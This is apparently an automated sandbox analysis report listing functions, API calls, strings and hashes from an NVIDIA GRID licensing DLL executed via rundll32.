                                                                    • Instruction ID: ab862890c56d4a8aa6c55a0bfecdd67ee3878973e90dd5669defc96ce67b2d41
                                                                    • Opcode Fuzzy Hash: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
                                                                    • Instruction Fuzzy Hash: EF915B34A0FB43F2FBA0DB15A850175A2A0FF48BC4F554539C85E42660EFBDF9649A38
                                                                    Function 00007FF8A8D7C3D0 Relevance: 42.4, APIs: 13, Strings: 11, Instructions: 439memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapswprintf$Crypt$AlgorithmProcessProvider$AllocCloseDestroyFreeHashInit_thread_footerOpen
                                                                    • String ID: Failed to allocate memory$Failed to create hash object (0x%x) - (%s)$Failed to generate final hash on the data buffer (0x%x) - (%s)$Failed to get the size of object (0x%x) - (%s)$Failed to open algorithm handle (0x%x) - (%s)$Failed to perform hash on data buffer (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$HashDigestLength$SHA256$computeHash$z
                                                                    • API String ID: 3126380757-3389556609
                                                                    • Opcode ID: b059ba0a22e368afd7ffbfb9dcf22721acfcdc026d5598ebe77179670a913cd6
                                                                    • Instruction ID: 86fdbabcc1ad23f813ec594207a47b10eafa3e09e8791a45049db9e7b8fce3b0
                                                                    • Opcode Fuzzy Hash: b059ba0a22e368afd7ffbfb9dcf22721acfcdc026d5598ebe77179670a913cd6
                                                                    • Instruction Fuzzy Hash: C2221E32A09B42A9FB10DB60E4406ED77B4FB84398F500236DA9C53B69EF3CE659C754
                                                                    Function 00007FF8A8CFFA78 Relevance: 40.8, APIs: 17, Strings: 6, Instructions: 554registrystringlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFAFD
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFB1A
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFB8F
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFC09
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFC38
                                                                    • RegDeleteValueW.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFCFA
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFD13
                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFDD3
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFDF2
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8CFFEA5
                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 00007FF8A8D000D2
                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D000F9
                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 00007FF8A8D00171
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D0019A
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D0020F
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00007FF8A8CFF9FF,?,00000000,?,?,00000000,00000000,?,00007FF8A8CFEBC1), ref: 00007FF8A8D00276
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpi$Close$InfoQuery$AddressDeleteHandleModuleProcValue
                                                                    • String ID: Advapi32.dll$Delete$ForceRemove$NoRemove$RegCreateKeyTransactedW$Val
                                                                    • API String ID: 1125866879-2283023311
                                                                    • Opcode ID: a81cd6ff42175f36a570d7155600b032d25fbc0e0051d893f1f2f01bd3fe8d14
                                                                    • Instruction ID: 5009b1dcf0de34444c93ee0f7dfe29668c2cc5618bf03ccb7ab8c6775c66ef65
                                                                    • Opcode Fuzzy Hash: a81cd6ff42175f36a570d7155600b032d25fbc0e0051d893f1f2f01bd3fe8d14
                                                                    • Instruction Fuzzy Hash: 08329231F0EB42A6FB549B66A85017D66B5EF847C4F104036DA4E87A98EF7CEC44CB18
                                                                    Function 00007FF8A8D72E90 Relevance: 39.0, APIs: 15, Strings: 7, Instructions: 530filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindNextFileW.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7318F
                                                                    • CompareFileTime.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D733F7
                                                                    • FindNextFileW.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7348B
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D73496
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D7349C
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D734A2
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A8D734A8
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D734C1
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D735B7
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D72F2B
                                                                      • Part of subcall function 00007FF8A8D2E228: _Init_thread_footer.LIBCMT ref: 00007FF8A8D2E2EB
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73059
                                                                    • FindFirstFileW.KERNEL32(00000000,00000000,?,?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000), ref: 00007FF8A8D73069
                                                                    • GetLastError.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D7307E
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D7309E
                                                                    • FindClose.KERNEL32(?,?,00007FF8A8D73E60,?,?,00007FF8A8D747A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FF8A8D2EA05), ref: 00007FF8A8D73690
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$FileFind_invalid_parameter_noinfo_noreturn$Next$CloseCompareErrorFirstInit_thread_footerLastTime
                                                                    • String ID: %hs\*.*$Failed to allocate memory$GridCommonUtils.cpp$Maximum buffer size exceeded$Maximum number of files reached$Unable to open directory %s (%d)$getFileFromDirectory
                                                                    • API String ID: 566297033-2797159653
                                                                    • Opcode ID: 95e9fa77f29442ae51123867474ab5d9699e355270a74feb44b2d9aedd89110e
                                                                    • Instruction ID: e7bb7da2b5c1391b3602567f7a7632a6e3743b6ccb444b4c2695be2fa22b736e
                                                                    • Opcode Fuzzy Hash: 95e9fa77f29442ae51123867474ab5d9699e355270a74feb44b2d9aedd89110e
                                                                    • Instruction Fuzzy Hash: CF426F32A0AB82A9EB14DB60E4403ED77A4FB443C8F801136EA5D53BA9EF7CD549C714
                                                                    Function 00007FF8A8CFDCBC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 202registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Setup$Device$ErrorLast$CloseInfo$ActiveClassConsoleDestroyDevsEnumEnumerateFreeGet_HandleInstanceListMemoryNode_OpenPropertyQueryRegistrySessionSessionsStatusTokenUserlstrcmpi
                                                                    • String ID: ?$nvlddmkm$ven_10de
                                                                    • API String ID: 3270881034-1305278625
                                                                    • Opcode ID: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
                                                                    • Instruction ID: 2d5d64ce3ec9860c0c3b8b09aae33b86d3b8bf5f8cc95ffc7d912841cc44555e
                                                                    • Opcode Fuzzy Hash: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
                                                                    • Instruction Fuzzy Hash: 6491B336A09B42A6FB509F21E8046AA77A0FB85BD4F444131DF5D03A98DF7CE908CB14
                                                                    Function 00007FF8A8D7CB80 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 198librarywindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$FreeLibrary$ErrorFormatInit_thread_footerLastLoadLocalMessageswprintf
                                                                    • String ID: Failed to load ntdll library (%d)$GridCloudLicensingCryptoWindows.cpp$NTDLL.DLL$displayError
                                                                    • API String ID: 493128418-3483970641
                                                                    • Opcode ID: 84a4afb11369bb0699246fdfb17eaa0a2dcfdd60ede8118076655972b869c54a
                                                                    • Instruction ID: bc9b3cd0430cce7c6da11c846aadb0afb2c99b1df81c04b6f16e4a25467d63dd
                                                                    • Opcode Fuzzy Hash: 84a4afb11369bb0699246fdfb17eaa0a2dcfdd60ede8118076655972b869c54a
                                                                    • Instruction Fuzzy Hash: 0B919D32A0AB42A9EB109B60E4443ED3BB0EB447D8F500535DA6D13BA9DF3CE599C758
                                                                    Function 00007FF8A8CFBCB8 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 224memorylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLocalProc$AllocErrorLast$Free$AttributesConditionFileInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDevicePropertyW$SetupGetInfDriverStoreLocationW$Setupapi.dll
                                                                    • API String ID: 479516965-190797902
                                                                    • Opcode ID: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
                                                                    • Instruction ID: 504a169f1de5bf1f39e04ca5b3f7ba89bac3bcaa4cf04a9607f9c3b843d4f337
                                                                    • Opcode Fuzzy Hash: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
                                                                    • Instruction Fuzzy Hash: 48A17E35A0AB42E2FB54DB15E84017963A5FF88BC0F444035EA8D437A5EF7DE925CB28
                                                                    Function 00007FF8A8CFAF20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 171memorylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Local$ConditionFreeMask$AllocFullNamePath$AddressInfoProcVerifyVersion
                                                                    • String ID: $$&$*$SHGetFolderPathW$Shell32.dll
                                                                    • API String ID: 3471609363-2843092907
                                                                    • Opcode ID: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
                                                                    • Instruction ID: 5368f12639b36c63277034af0d3530a5e76bdec55ff4edb13d23d375a8812818
                                                                    • Opcode Fuzzy Hash: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
                                                                    • Instruction Fuzzy Hash: 4271BF71A0B742A2FB54DB11A8146B963A5FF88BC0F444039DE0E47751EF7CF8248B28
                                                                    Function 00007FF8A8D7B720 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 321memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap_invalid_parameter_noinfo_noreturnswprintf$CryptProcess$AlgorithmAllocCloseDestroyErrorFreeInit_thread_footerLastLibraryLoadProvider
                                                                    • String ID: Failed to allocate memory$Failed to decrypt data (0x%x) - (%s)$Failed to generate symmetric key$GridCloudLicensingCryptoWindows.cpp$cloudLicTSDecrypt
                                                                    • API String ID: 2854389447-713850402
                                                                    • Opcode ID: 8e5db5f4a7db09f163fea8d2fd5a66426e81deaa305d208767d4c252137c8f24
                                                                    • Instruction ID: 37802e09e986a198f7a3b9c3e2aba6856757b7b0d83b76787cae3c560b110946
                                                                    • Opcode Fuzzy Hash: 8e5db5f4a7db09f163fea8d2fd5a66426e81deaa305d208767d4c252137c8f24
                                                                    • Instruction Fuzzy Hash: BFF13B32A09B41A9EB20DF60E8406DE77B4FB44398F500236DA9C57B69EF3CE159CB54
                                                                    Function 00007FF8A8DB9470 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 205sleeplibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: HandleValue$Close$AddressCreateEventExceptionModuleMultipleObjectsProcResetSleepThrowTimerWaitWaitable
                                                                    • String ID: KERNEL32.DLL$SetWaitableTimerEx
                                                                    • API String ID: 484217208-2877992516
                                                                    • Opcode ID: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
                                                                    • Instruction ID: 5f7380710e15a94dcd84bf18817d83dd4338037efed58f2d0c8fc77ddc8949fa
                                                                    • Opcode Fuzzy Hash: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
                                                                    • Instruction Fuzzy Hash: C091B232A0AB82AAEB108F25A45452973A4FF457E0F540335DA7E437E4EF3CE819C724
                                                                    Function 00007FF8A8D2E90C Relevance: 26.8, APIs: 3, Strings: 12, Instructions: 505stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeallocateValuestd::_$AttributesFileInit_thread_footerlstrcat
                                                                    • String ID: Failed to read configurations from client configuration token. Error :$InitGridCloudLicenseStateMachine$Initializing state machine for nvvsvc $Local storage directory:$NvXDCore.cpp$ProxyServerAddress$ProxyServerPort$SOFTWARE\NVIDIA Corporation\Global\GridLicensing$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing$TrustedStorage$\NVIDIA Corporation$vGPU Licensing
                                                                    • API String ID: 2105504189-1287553087
                                                                    • Opcode ID: de54237209b21e900c89f71d870fed6715800c4f0a1de3a8308ca53b55b6232e
                                                                    • Instruction ID: afc5780ab5700dbc4b45fa2c0657d026c873880e338e8d676257dfff30ac3639
                                                                    • Opcode Fuzzy Hash: de54237209b21e900c89f71d870fed6715800c4f0a1de3a8308ca53b55b6232e
